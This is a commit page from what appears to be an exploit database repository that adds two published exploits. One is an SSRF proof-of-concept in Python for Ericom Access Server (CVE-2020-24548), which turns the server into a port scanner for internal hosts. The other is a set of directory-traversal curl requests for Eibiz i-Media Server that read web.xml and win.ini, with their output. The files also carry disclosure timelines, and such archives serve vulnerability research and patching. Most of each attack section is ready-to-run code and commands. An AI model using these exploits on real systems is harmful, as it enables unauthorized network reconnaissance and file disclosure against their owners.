DB: 2020-08-27
3 changes to exploits/shellcodes Ericom Access Server x64 9.2.0 - Server-Side Request Forgery Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal
This commit is contained in:
parent
1567b7af86
commit
8bf2002f51
4 changed files with 229 additions and 0 deletions
170
exploits/multiple/webapps/48765.txt
Normal file
170
exploits/multiple/webapps/48765.txt
Normal file
|
@ -0,0 +1,170 @@
|
||||||
|
# Exploit Title: Ericom Access Server x64 9.2.0 - Server-Side Request Forgery
|
||||||
|
# Date: 2020-08-22
|
||||||
|
# Exploit Author: hyp3rlinx
|
||||||
|
# Vendor Homepage: www.ericom.com
|
||||||
|
# Version: Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0
|
||||||
|
# CVE: CVE-2020-24548
|
||||||
|
|
||||||
|
[+] Credits: John Page (aka hyp3rlinx)
|
||||||
|
[+] Website: hyp3rlinx.altervista.org
|
||||||
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/ERICOM-ACCESS-SERVER-ACCESS-NOW-BLAZE-9.2.0-SERVER-SIDE-REQUEST-FORGERY.txt
|
||||||
|
[+] twitter.com/hyp3rlinx
|
||||||
|
[+] ISR: ApparitionSec
|
||||||
|
|
||||||
|
|
||||||
|
[Vendor]
|
||||||
|
www.ericom.com
|
||||||
|
|
||||||
|
|
||||||
|
[Product]
|
||||||
|
Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0
|
||||||
|
|
||||||
|
AccessNow is an HTML5 remote desktop gateway that works from any device with an HTML5 compatible browser,
|
||||||
|
including from Chromebooks and locked down devices. Ericom Blaze provides remote desktop connectivity from
|
||||||
|
Mac, Windows and Linux devices to applications on office / home PCs and virtual desktops (VDI).
|
||||||
|
|
||||||
|
|
||||||
|
[Vulnerability Type]
|
||||||
|
Server Side Request Forgery
|
||||||
|
|
||||||
|
|
||||||
|
[CVE Reference]
|
||||||
|
CVE-2020-24548
|
||||||
|
|
||||||
|
|
||||||
|
[Security Issue]
|
||||||
|
Ericom Access Server allows attackers to initiate SSRF requests making outbound
|
||||||
|
connections to arbitrary hosts and TCP ports. Attackers, who can reach the
|
||||||
|
AccessNow server can target internal systems that are behind firewalls that are
|
||||||
|
typically not accessible. This can also be used to target third-party systems
|
||||||
|
from the AccessNow server itself.
|
||||||
|
|
||||||
|
The AccessNow server will return an attacker friendly response, exfiltrating
|
||||||
|
which ports are listening for connections. This can bypass Firewall rules and
|
||||||
|
undermine the integrity of other systems and security controls in place.
|
||||||
|
|
||||||
|
E.g. listen using Netcat, Nc64.exe -llvp 25
|
||||||
|
|
||||||
|
A) Ericom Server 192.168.88.152 (defaults port 8080)
|
||||||
|
B) Attacker 192.168.88.162
|
||||||
|
C) Victim 192.168.1.104
|
||||||
|
|
||||||
|
Using Wireshark we can observe A sends a SYN packet to C (port 25)
|
||||||
|
C sends SYN/ACK to A
|
||||||
|
A sends ACK to C.
|
||||||
|
A sends ACK/FIN to C port 25.
|
||||||
|
|
||||||
|
We will then get an AccessNow server response similar to below.
|
||||||
|
["C","M",["Cannot connect to '192.168.1.104:25'.",true]]
|
||||||
|
|
||||||
|
This message indicates we cannot connect and helpfully informs us of closed vs open ports.
|
||||||
|
|
||||||
|
[Affected Component]
|
||||||
|
Ericom Server port 8080 will forward connections to arbitrary Hosts and or Ports
|
||||||
|
which are sent using Web-Socket requests. Ericom server then replies with a
|
||||||
|
"Cannot connect to" message if a port is in a closed state.
|
||||||
|
|
||||||
|
|
||||||
|
[Attack Vectors]
|
||||||
|
Remote attackers can abuse the Ericom Access Server to conduct port
|
||||||
|
scans on arbitrary systems. This is possible due to a server side
|
||||||
|
request forgery vulnerability and using a remote TCP socket program.
|
||||||
|
|
||||||
|
|
||||||
|
[Impact Information Disclosure]
|
||||||
|
true
|
||||||
|
|
||||||
|
|
||||||
|
[CVE Impact Other]
|
||||||
|
Exfiltration of open ports
|
||||||
|
|
||||||
|
|
||||||
|
[Exploit/POC]
|
||||||
|
import sys,ssl
|
||||||
|
import websocket
|
||||||
|
##pip install websocket-client #Required
|
||||||
|
|
||||||
|
#By hyp3rlinx
|
||||||
|
#ApparitionSec
|
||||||
|
#========================================================
|
||||||
|
#Ericom Access Server v9.2.0 for (AccessNow & Blaze) SSRF
|
||||||
|
#========================================================
|
||||||
|
|
||||||
|
BANNER="""
|
||||||
|
______ _____
|
||||||
|
| ____| / ____|
|
||||||
|
| |__ _ __ _ __ ___ _ __| | ___ _ __ ___
|
||||||
|
| __| | '__| '__/ _ \| '__| | / _ \| '_ ` _ \
|
||||||
|
| |____| | | | | (_) | | | |___| (_) | | | | | |
|
||||||
|
|______|_| |_| \___/|_| \_____\___/|_| |_| |_|
|
||||||
|
SSRF Exploit
|
||||||
|
"""
|
||||||
|
|
||||||
|
def ErrorCom(vs,vp,t,p):
|
||||||
|
try:
|
||||||
|
ws = websocket.create_connection("wss://"+vs+":"+vp+"/blaze/"+t+":"+p, sslopt={'cert_reqs': ssl.CERT_NONE})
|
||||||
|
ws.send("SSRF4U!")
|
||||||
|
result = ws.recv()
|
||||||
|
#print(result)
|
||||||
|
if result.find("Cannot connect to")==-1:
|
||||||
|
print("[+] Port "+p+" is open for business :)")
|
||||||
|
else:
|
||||||
|
print("[!] Port " + p+ " is closed :(")
|
||||||
|
ws.close()
|
||||||
|
except Exception as e:
|
||||||
|
print(str(e))
|
||||||
|
|
||||||
|
if __name__=="__main__":
|
||||||
|
|
||||||
|
if len(sys.argv) != 5:
|
||||||
|
print(BANNER)
|
||||||
|
print("[+] Ericom Access Server v9.2.0 - SSRF Exploit - CVE-2020-24548")
|
||||||
|
print("[+] By Hyp3rlinX / ApparitionSec")
|
||||||
|
print("[!] Usage: <vuln-server>,<port (usually 8080)>,<target>,<port-to-scan>")
|
||||||
|
exit()
|
||||||
|
|
||||||
|
if len(sys.argv[4]) > 5:
|
||||||
|
print("[!] Port out of range")
|
||||||
|
exit()
|
||||||
|
|
||||||
|
print(BANNER)
|
||||||
|
ErrorCom(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[PoC Video URL]
|
||||||
|
https://www.youtube.com/watch?v=oDTd-yRxVJ0
|
||||||
|
|
||||||
|
|
||||||
|
[Network Access]
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
[Severity]
|
||||||
|
Medium
|
||||||
|
|
||||||
|
|
||||||
|
[Disclosure Timeline]
|
||||||
|
Vendor Notification : June 21, 2020
|
||||||
|
Received automated reply : June 21, 2020
|
||||||
|
Request for status : June 30, 2020
|
||||||
|
Vendor "Forwarded all the detail to our R&D and Management team" : June 30, 2020
|
||||||
|
Request for status : July 13, 2020
|
||||||
|
No vendor reponse
|
||||||
|
Informed vendor advisory: August 11, 2020
|
||||||
|
Request for status : August 20, 2020
|
||||||
|
No vendor reponse
|
||||||
|
August 22, 2020 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||||
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||||
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||||
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||||
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||||
|
or exploits by the author or elsewhere. All content (c).
|
||||||
|
|
||||||
|
hyp3rlinx
|
56
exploits/multiple/webapps/48766.txt
Normal file
56
exploits/multiple/webapps/48766.txt
Normal file
|
@ -0,0 +1,56 @@
|
||||||
|
# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal
|
||||||
|
# Date: 2020-08-22
|
||||||
|
# Exploit Author: LiquidWorm
|
||||||
|
# Vendor Homepage: http://www.eibiz.co.th
|
||||||
|
# Affected version: <=3.8.0
|
||||||
|
# CVE: N/A
|
||||||
|
|
||||||
|
Eibiz i-Media Server Digital Signage 3.8.0 (oldfile) File Path Traversal
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: EIBIZ Co.,Ltd.
|
||||||
|
Product web page: http://www.eibiz.co.th
|
||||||
|
Affected version: <=3.8.0
|
||||||
|
|
||||||
|
Summary: EIBIZ develop advertising platform for out of home media in that
|
||||||
|
time the world called "Digital Signage". Because most business customers
|
||||||
|
still need get outside to get in touch which products and services. Online
|
||||||
|
media alone cannot serve them right place, right time.
|
||||||
|
|
||||||
|
Desc: i-Media Server is affected by a directory traversal vulnerability. An
|
||||||
|
unauthenticated remote attacker can exploit this to view the contents of
|
||||||
|
files located outside of the server's root directory. The issue can be
|
||||||
|
triggered through the 'oldfile' GET parametery.
|
||||||
|
|
||||||
|
Tested on: Windows Server 2016
|
||||||
|
Windows Server 2012 R2
|
||||||
|
Windows Server 2008 R2
|
||||||
|
Apache Flex
|
||||||
|
Apache Tomcat/6.0.14
|
||||||
|
Apache-Coyote/1.1
|
||||||
|
BlazeDS Application
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2020-5585
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5585.php
|
||||||
|
|
||||||
|
|
||||||
|
26.07.2020
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
$ curl "http://192.168.1.1/dlibrary/null?oldfile=../../WEB-INF/web.xml&library=null"
|
||||||
|
|
||||||
|
$ curl "http://192.168.1.1/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null"
|
||||||
|
; for 16-bit app support
|
||||||
|
[fonts]
|
||||||
|
[extensions]
|
||||||
|
[mci extensions]
|
||||||
|
[files]
|
||||||
|
[Mail]
|
||||||
|
MAPI=1
|
|
@ -6,6 +6,7 @@
|
||||||
# Version: 5.0
|
# Version: 5.0
|
||||||
# Tested on: Windows 10
|
# Tested on: Windows 10
|
||||||
# Contact: https://www.linkedin.com/in/th3cyb3rc0p/
|
# Contact: https://www.linkedin.com/in/th3cyb3rc0p/
|
||||||
|
# CVE: CVE-2020-24609
|
||||||
|
|
||||||
Stored Cross-site scripting(XSS):
|
Stored Cross-site scripting(XSS):
|
||||||
Stored attacks are those where the injected script is permanently stored on the target servers,
|
Stored attacks are those where the injected script is permanently stored on the target servers,
|
||||||
|
|
|
@ -43004,3 +43004,5 @@ id,file,description,date,author,type,platform,port
|
||||||
48762,exploits/php/webapps/48762.txt,"LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting",2020-08-24,"Matthew Aberegg",webapps,php,
|
48762,exploits/php/webapps/48762.txt,"LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting",2020-08-24,"Matthew Aberegg",webapps,php,
|
||||||
48763,exploits/hardware/webapps/48763.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass",2020-08-24,LiquidWorm,webapps,hardware,
|
48763,exploits/hardware/webapps/48763.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass",2020-08-24,LiquidWorm,webapps,hardware,
|
||||||
48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,
|
48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,
|
||||||
|
48765,exploits/multiple/webapps/48765.txt,"Ericom Access Server x64 9.2.0 - Server-Side Request Forgery",2020-08-26,hyp3rlinx,webapps,multiple,
|
||||||
|
48766,exploits/multiple/webapps/48766.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal",2020-08-26,LiquidWorm,webapps,multiple,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue